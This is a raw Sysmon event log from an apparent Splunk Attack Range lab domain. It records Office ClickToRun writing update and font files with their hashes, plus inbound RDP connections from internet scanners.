14:55:38.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\XLICONS.EXEMD5=1231F70A562BAB79A304A915877A4997,SHA256=4637F66C795B28EEFDC984D5AC5E567B4AA3181B728FC0D79C5A7FFDE3C7BD27,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000070392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.577{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62691-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\XLCALL32.DLLMD5=8E002EAC4CE6CE226D0DB4B0C6240019,SHA256=895A9A4A55287C1C1F3FF4576548F10D34F41C6B14C00CABBDD855C6A8A00DF1,IMPHASH=A5B35E65DC13734583540294C92316EAtruetrue 23542300x800000000000000070390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WWLIB.DLLMD5=B042780E70D99F5B97DCF491980FDED6,SHA256=3ADE6090F9B9297E0C2FE896071EF01CB7B5B8AE3DBC2FC030A8D4429DD1746B,IMPHASH=DAB6372787E7C05D7B5E5BEA473D8C60truetrue 23542300x800000000000000070389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\wordvisi.ttfMD5=A94ACFEA575E7E6EACBDE1A79EA43C2C,SHA256=23434E62C5281CF8515DB32008A3F9AC767CFC45A670F765399492897C45BC31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WordInterProviderRanker.binMD5=D417869BD8D8EE882404CB0A7C07C443,SHA256=40C8CBA69D6E7BFEECBF7E7CE096EA128BA8926899076C9FB1EE028BD979F395,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WORDICON.EXEMD5=0FFB1FB40019049304D3A414DD3A51BB,SHA256=0CD69C9720CB15D39CAE5F0B3F6C9F36AC07CC89EF867A987CCAAA9D11312B42,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\wordEtw.manMD5=3D705868DF16EE52CDD1B9C52242AB0E,SHA256=DE585DB36CCD520B20CF89928EC0FAACC6D6E02EA7501D093A484A364A33FED2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Wordconv.exeMD5=171C38F67DB9784F1833FA3B8F1BFF35,SHA256=11C1159C77A62AB01B131F11CA6E4F0659F296A8350E4E6B268BE15CD63AC2BA,IMPHASH=E67576EE44907D75FECE910A332F2783truetrue 23542300x800000000000000070384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WordCombinedFloatieMruModel.onnxMD5=F0795F1994D3B88E438E2B38C5AF632F,SHA256=D3AA396A5D0F34020770E921C3D3E943E5FF21DD71AE5187B04E16D108FCC219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049793Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:38.399{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09F22B5CA4C47BCB26686FEFDD96301F,SHA256=5FABAEDA7E940FCA1B5C0345221DB666AC3E2548C6C8884FAD71C2A7869E2079,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049792Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:36.300{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63243-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049791Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:35.224{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54264-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049790Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:38.055{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FA860D1DEC0C271B2BECD5B7AA73D1D,SHA256=EAE7C94E33FBD0351A13AC8E7D9A76DB676FE7D25FC8C3CB5741881C342C3E69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MOD20.TTFMD5=60D6C0A842B685A53E5D767240B99774,SHA256=CD7C7867A456CEAE560D825CBEC1D95B3DE8CB62B00CE513DB6AFC293F243218,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MISTRAL.TTFMD5=E66E26A6E3C218F7748DD0BD9CB034FF,SHA256=A03A3A71113D44D7BFB98E9720264F72A05BA112E191FB78EB08D11A3F41E500,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MATURASC.TTFMD5=34A1156588649C61EA04538BAAEEF237,SHA256=E334BF287BDF4211FE5958C4926C8AD4DDD3F44F5FDCB2D9DCFA1394186D8132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MAIAN.TTFMD5=0141DF8C3436A6C3EB8BE69855E1EC0D,SHA256=8CD40AC425585EE56A4A98F19A1F646828CEC1E9565B4A0BFAB1D4CE9D7A81C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\MAGNETOB.TTFMD5=E564AB2A94B273E5648FF05697ECCAD2,SHA256=455964B4A07AF53205ED705E0F40778FF203F2C9E7C72A8BF2C4D7A3A834E895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LTYPEO.TTFMD5=B29730A7D6D05D4EF08787E2EADE3A2A,SHA256=980E0CE5A0F4C407E90C72A16DA2A259B7FC2A0EA48D1FAF048028B2735FA941,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LTYPEBO.TTFMD5=CC19DEE449A8C883DB9888CA2A160AA4,SHA256=187F363E9C2E328409938B4413027FE8F0C55423913BA66EA66D3F0D7FD5C74E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LTYPEB.TTFMD5=BF0963C761AB1C6419D7E90E392DEA13,SHA256=993B8AD78909D2B9D67EA0001112CAC238FB65C6B31F6729FDB0B86C24E2B8AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LTYPE.TTFMD5=D6C215F188C6EB32AC517BED8BD4C868,SHA256=B700D1BC51A11C77CA7B119B0677A9CD4DC1E61FE43A7130BC2044CD7DC9B116,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LSANSI.TTFMD5=29C1D76649D5D1FFDC1A3E8F48726BAC,SHA256=CA117345D190CDA8AD6C7A41AF1D6D43C475D0FDC99C97B8D325986309597F7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LSANSDI.TTFMD5=9D846236FBBFAF646864313CA9AD8FA6,SHA256=EB2D865BDADBDD19DACD2AA6F1A0D4E93263B3DAC13DE536106286E809ABC238,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LSANSD.TTFMD5=9F4C90054D13847235E1819B0FF97BD1,SHA256=76160CE9CD774532131CF4902B810A2D02C94F225DA238FF8C04E25875EB66C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LSANS.TTFMD5=B6AA2B12D843F986BFCBDB2274C494CE,SHA256=EB3F949BA0F1368698E69396259E667D9FB913EBFDE3C742D493AAE5DD57141E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LHANDW.TTFMD5=B9DB8F4E52615927FA7386CF391E38FE,SHA256=C5AB997A1C3E49CB0D34FA5A3F2C39934D39F2657DCA224FCB3B480768676501,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LFAXI.TTFMD5=AC0EFE77CC81825FCDEFD7F07F025DE5,SHA256=27899B1624A2C13245CBFD28666090E3FE9CA17ECBA4CD6E19A615892F6C6DB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LFAXDI.TTFMD5=752F1FA8D5FE3CD4079EFED344F5C459,SHA256=FD16AF41073406530C7633BBF6976C1AECAC1F4BC9D1882135CF58EC9B31DD07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LFAXD.TTFMD5=98026039604790C312C25C1C8DF5CBB4,SHA256=1A8DD16D0D1456923C5D3824943771E63EB67E6B8660E5C1C479674FBBBA163D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LFAX.TTFMD5=113ECF48E1EAE740220B9827DF027F25,SHA256=25B23E0E8BA977DA78FD0F6C13B76E561756010A73CB5A8187DD817496E25FEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LEELAWDB.TTFMD5=B09B497925AE99F5B58FB854E1056F5B,SHA256=436BB96F8BBB151E7634FCEA07794044A8565B013E505245322DAFA13E6C3EFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LEELAWAD.TTFMD5=63921FE40D60C5BD6EFF14F10065BC18,SHA256=11E1960D6ACA5D6DE0FCBEDA530DBB3DEA8837D810596C54235B07A9FBE43F9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LCALLIG.TTFMD5=23CB1A7D54469B3E8694A8BFE24235DC,SHA256=5C7E6C59E09C38C4E280504741BCFC051C95A9C931B3C92C03B7F2733F580622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LBRITEI.TTFMD5=0B98848F13A5064A6AD70B64B57B6295,SHA256=D347D9AE8A42C63ED7DC15BBA992D00EE9E606E0AC499A8022757C275855F612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LBRITEDI.TTFMD5=165F9F6FA7E111A2D7D7A47EE0D356EA,SHA256=B2D15815CE8F722E22885E67562A66F512F6412399D9400AC01FECD718D54839,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LBRITED.TTFMD5=08E0DF984954C5BAA5BDD314187F43CD,SHA256=8012EB0EC90AB1B7A40EEC8987927D5764055E332BDB19AB5EEB3C1CF67987C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.923{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CA7C80CE97C21E3CA3E5FED7625900D,SHA256=56177459369F535163704878FE3CC61A9A717A6F13525CCF4A5E303013CC56C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LBRITE.TTFMD5=825A2395154F2A944B653BCB7839DD27,SHA256=736EB3BDC990636D283384CF6428B03A6632AE16E81DC72CD28AECD0CDADB017,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\LATINWD.TTFMD5=B0A2D09878C1309345795EF79F40367F,SHA256=D64B9E6668069915AE217548B010BE1B52BE99BC923E88E148A83619B0102868,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\KUNSTLER.TTFMD5=564DDB14FBCB4963F390ED661A60CF1F,SHA256=8A9783E50F3BF892D958B7E61990D6CCAEE65DAAA0FFC246D3E1BD4FB0104B41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\JUICE___.TTFMD5=E7BED05C30089838608B1C37988D78E7,SHA256=EFEF0FA6138C648F9B5694F11D3372CF2733AE6126C91DBC7B2327C00546A699,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\JOKERMAN.TTFMD5=EEC0608FF80827A878D7DA11B3B71857,SHA256=D0D2D8EFDBF07DF506C87F9CADCD5052A6E446C99570177B1F98555661C6937C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ITCKRIST.TTFMD5=A60FF8FB2AD06679257381C2EE3F15E0,SHA256=A298C30E23BEB222A016AFA24D4D8F389F30AC3B8BE6763F9F94199C3B11FF0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ITCEDSCR.TTFMD5=CA6F91C0CAD2FE33614026D17117601D,SHA256=60C4F425563B12A6C0223D5C65212FFFB42F4B3D84789084AAE44C42F3416865,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ITCBLKAD.TTFMD5=3FD720312D86FC1944351C0219148484,SHA256=2934319D3C6BA08A4477A3DC4F08695D4B926FC81A316F7A278E780AB5C9609D,IMPHASH=00000000000000000000000000000000falsetrue 